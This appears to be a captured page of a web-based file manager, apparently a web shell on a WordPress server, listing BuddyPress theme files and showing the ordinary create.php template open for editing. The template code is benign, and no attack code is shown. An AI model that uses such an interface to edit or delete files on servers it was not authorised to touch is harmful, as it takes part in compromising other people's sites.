golden hour
/var/www/html/wp-content/plugins/buddypress/bp-themes/bp-default/blogs
⬆️ Go Up
Upload
File/Folder
Size
Actions
blogs-loop.php
1.87 KB
Del
OK
create.php
1.18 KB
Del
OK
index.php
2.86 KB
Del
OK
Edit: create.php
<?php /** * BuddyPress - Create Blog * * @package BuddyPress * @subpackage bp-default */ get_header( 'buddypress' ); ?> <?php do_action( 'bp_before_directory_blogs_content' ); ?> <div id="content"> <div class="padder" role="main"> <?php do_action( 'bp_before_create_blog_content_template' ); ?> <?php do_action( 'template_notices' ); ?> <h3><?php _e( 'Create a Site', 'buddypress' ); ?> <a class="button" href="<?php echo trailingslashit( bp_get_root_domain() . '/' . bp_get_blogs_root_slug() ); ?>"><?php _e( 'Site Directory', 'buddypress' ); ?></a></h3> <?php do_action( 'bp_before_create_blog_content' ); ?> <?php if ( bp_blog_signup_enabled() ) : ?> <?php bp_show_blog_signup_form(); ?> <?php else: ?> <div id="message" class="info"> <p><?php _e( 'Site registration is currently disabled', 'buddypress' ); ?></p> </div> <?php endif; ?> <?php do_action( 'bp_after_create_blog_content' ); ?> <?php do_action( 'bp_after_create_blog_content_template' ); ?> </div><!-- .padder --> </div><!-- #content --> <?php do_action( 'bp_after_directory_blogs_content' ); ?> <?php get_sidebar( 'buddypress' ); ?> <?php get_footer( 'buddypress' ); ?>
Save